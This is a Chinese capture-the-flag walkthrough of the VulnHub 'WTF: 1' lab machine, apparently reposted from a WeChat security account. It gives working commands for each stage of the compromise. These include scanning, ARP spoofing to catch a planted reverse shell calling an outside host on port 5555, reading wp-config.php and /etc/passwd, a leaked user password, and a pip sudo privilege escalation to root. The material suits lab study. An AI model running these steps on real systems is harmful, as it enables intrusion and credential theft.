OSCP难度靶机之WTF: 1

admin 2022年5月28日22:36:39安全文章评论9 views1599字阅读5分19秒阅读模式

虚拟机信息

虚拟机下载地址:https://www.vulnhub.com/entry/wtf-1,399/

虚拟机简介:初学者 - 中级机器,你的目标是阅读 /root/flag.txt

目标:1个flag

级别:中级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之WTF: 1

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.139

查看开放22、80端口

OSCP难度靶机之WTF: 1

3、渗透测试

3.1 WEB渗透

1.访问站点进行测试

没有发现有用信息

OSCP难度靶机之WTF: 1

2.网站测试

nikto -host http://192.168.207.139

使用nikto和dirb均未发现有用信息

OSCP难度靶机之WTF: 1

3.gobuter进行测试

# 安装渗透测试字典
apt -y install seclists
apt install gobuster
gobuster dir --url http://192.168.207.143/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt

发现zhkh目录文件

OSCP难度靶机之WTF: 1

4.访问目录测试

打开站点访问比较慢,需要等一会才能加载出来

OSCP难度靶机之WTF: 1

5.使用nikto进行测试

nikto -host http://192.168.207.143/zhkh

发现测试站点为WordPress,并且发现有上传目录

OSCP难度靶机之WTF: 1

6.访问上传目录

http://192.168.207.143/zhkh/wp-content/uploads/uigen_2019/

在uigen_2019目录中发现有一个shell.php文件

OSCP难度靶机之WTF: 1

7.访问shell.php页面

发现页面提示报错信息

OSCP难度靶机之WTF: 1

根据报错信息进行查找,发现为metasploitable的反弹shell

OSCP难度靶机之WTF: 1

8.访问页面并尝试抓包

发现192.168.207.143有连接到192.168.1.14的TCP 5555端口

OSCP难度靶机之WTF: 1

9.Kali配置欺骗环境

在kali中添加一个IP地址

ip addr add 192.168.1.14/24 dev eth0

OSCP难度靶机之WTF: 1

开启端口转发

echo 1 > /proc/sys/net/ipv4/ip_forward

OSCP难度靶机之WTF: 1

10.使用arp欺骗攻击

kali开启端口监听TCP 5555端口

OSCP难度靶机之WTF: 1

开启ARP欺骗攻击

arpspoof -i eth0 -t 192.168.207.143 192.168.207.2

# 192.168.207.143为靶机IP地址
# 192.168.207.2 为靶机网关地址

由于反弹shell连接时,发起请求的源IP地址为靶机IP地址192.168.207.143,访问的目的地址为192.168.1.14与靶机非同网段,需要欺骗靶机伪造虚拟网关MAC把跨网段流量转发给Kali

OSCP难度靶机之WTF: 1

11.访问shell.php

访问shell.php后获取到反弹shell连接

OSCP难度靶机之WTF: 1

3.2 主机渗透

1.进入网站目录

cd /var/www/html/zhkh

查看网站配置信息,WordPress配置文件在wp-config.php中

OSCP难度靶机之WTF: 1

2.查看配置文件

cat wp-config.php

OSCP难度靶机之WTF: 1

在配置文件最下方有一个注释内容

OSCP难度靶机之WTF: 1

3.查看本地用户

cat /etc/passwd

查看ra用户具有登录权限

OSCP难度靶机之WTF: 1

4.切换用户

尝试以ra用户,密码为`Db]f{He3HgO`(z登录成功

OSCP难度靶机之WTF: 1

5.查看用户sudo权限

sudo -l

OSCP难度靶机之WTF: 1

6.通过pip进行提权

提权参考:https://gtfobins.github.io/gtfobins/pip/

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

OSCP难度靶机之WTF: 1

7.查看flag信息

cat /root/flag.txt

OSCP难度靶机之WTF: 1

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之WTF: 1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月28日22:36:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  OSCP难度靶机之WTF: 1 http://cn-sec.com/archives/1061639.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: